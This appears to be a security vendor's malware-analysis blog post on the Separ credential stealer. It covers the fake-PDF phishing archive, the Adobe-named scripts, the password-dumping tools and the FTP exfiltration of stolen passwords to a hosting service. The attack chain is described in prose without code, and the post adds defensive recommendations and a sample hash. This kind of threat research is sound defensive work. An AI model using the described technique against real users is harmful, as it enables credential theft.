Recently we came across renewed activity of the infamous credential stealer Separ, which our product prevented in customers’ environments. Previous attacks based on earlier variants of Separ date back to November 2017, with related info-stealers being active in the wild as far back as 2013.
The credential stealer Separ is unique, as it uses a combination of very short script or batch files, and legitimate executables, to carry out all of its malicious business logic. Therefore, Separ is an excellent example of the advanced and evasive attack technique commonly termed as “Living Off the Land”. In addition, Separ masquerades as a fake Adobe related program, using a fake PDF document as the initial infection vector, and malicious scripts and executable files named to resemble Adobe related programs.
“Living off the Land” attacks are based on legitimate files which are either common within the organization attacked, or are widely-used administrative tools, and can be abused to perform malicious functions. These tools are sometimes referred to as “Dual-Use” tools. Although “Living off the Land” is considered a type of file-less attack, this is an inaccurate definition, as the attack does involve executable files. In many cases these files are already found on disk in the victim’s machine (hence the term “Living off the Land”). In other cases, they are written to disk, but as mentioned before they are not malicious per-se and therefore go unnoticed. This technique, and the reason it is classified as a file-less attack, are described in detail in Deep Instinct’s whitepaper on file-less attacks, published in March 2018.
The attack is ongoing
Access to the hosting service used by Separ in this recent attack shows that its activity continues, and data stolen from many additional victims is being uploaded daily. The attack has affected hundreds of companies, located mainly in South East Asia and the Middle East, with some targets located in North America. Based on the names of the fake documents which initiate the attack, it appears the attacker is targeting business organizations, as most fake documents appear to be concerned with quotations, shipments, and equipment specifications.
Although this specific attack wave is new, and has only surfaced within the past few weeks, our research shows that variants of Separ have been around for several years, with older variants sharing some of techniques and mechanisms outlined ahead.
Infection chain and malicious logic
According to previous waves of Separ seen in the wild, the attack begins with a phishing email containing a malicious attachment. In this particular instance, the attachment was a decoy PDF document, which was in fact a self-extracting archive. However, the decoy is very basic as the extension of this “document” is .exe. The self-extractor contains within itself all files used in the attack – a VB Script, two batch scripts, and four executable files, with the following names: adobel.vbs, adob01.bat, adob02.bat, adobepdf.exe, adobepdf2.exe, ancp.exe, and Areada.exe. Many of the files are named to resemble files related to Adobe. The role of each file will be outlined in detail.
Overall, the attack flow is as follows:
Once the user clicks on the “PDF document” attached to the phishing email, the self-extractor calls wscript.exe to run a VB Script called adobel.vbs, which is extracted from the initial self-extractor.
This VB Script then calls a first batch script, adob01.bat, which sets up several directories and copies files to them, using xcopy.exe and attrib.exe, before launching a second batch script.
The second batch script, adob02.bat, performs the main malicious actions:
As can be seen above, the attackers make no attempt to hide their intentions, and use no obfuscation or evasion techniques. In addition, all the output file names and credentials used by the attackers are hard-coded in the scripts.
In order to carry out the malicious logic of the attack, Separ uses password dumping tools by SecurityXploded, contained in the initial self-extractor, with which it steals various user credentials before uploading them to the hosting service.
Separ also uses additional legitimate executables for actions: xcopy.exe, attrib.exe, sleep.exe (renamed Areada.exe), and ancp.exe. Details regarding ancp.exe are supplied in the next section.
Stolen data uploaded to a legitimate FTP service
Following infection and password extraction, the malware uses, ancp.exe, an FTP client, to upload files to freehostia.com. Both the executable and the service are legitimate – ancp.exe’s source is NcFTP, a legitimate FTP software provider, while FreeHostia is a well-known and widely-used hosting service.
The upload is performed using hard coded user names and passwords. Using these credentials, we were able to access the FTP, and view data organized into several clients.
However, each client directory contained data belonging to several different victims, collected over the last few weeks. Uploaded data contains ipconfig results in addition to email and browser passwords.
We were able to access the FTP server several times, and the growth in the number of victims was clearly visible, meaning the attack is ongoing and successfully infecting many victims.
Although the attack mechanism used by this malware is very simple, and no attempt has been made by the attacker to evade analysis, the growth in the number of victims claimed by this malware shows that simple attacks can be very effective. The use of scripts and legitimate binaries, in a “Living off the Land” scenario, means the attacker successfully evades detection, despite the simplicity of the attack. Due to the mechanisms used in the attack, and despite the lack of obfuscation or evasion by the attacker, this and similar attacks have been present in the wild for several years. This shows that many security solutions have difficulties detecting “Living off the Land” attack scenarios. Meanwhile, it should also be noted that the attack can be modified easily to evade detection and complicate analysis.
As written in our white paper on file-less malware, the abuse of admin tools, or of legitimate internal tools of organizations, requires organizations to change their defense mechanisms to protect themselves from attacks. To be better protected, organizations should have tight control over the users allowed to access administrative or native tools, and over the actions that can be performed by these tools.
In order to guard from these types of attacks, organizations should also undertake the following:
We are in the process of notifying all relevant parties which have been affected by the attack.
Original sha256: fc1b755217ee2d12b05b5211602a83dcc0ad0ce2f1271b904e1a125a38927780
Additional files used in attack:
Recent similar samples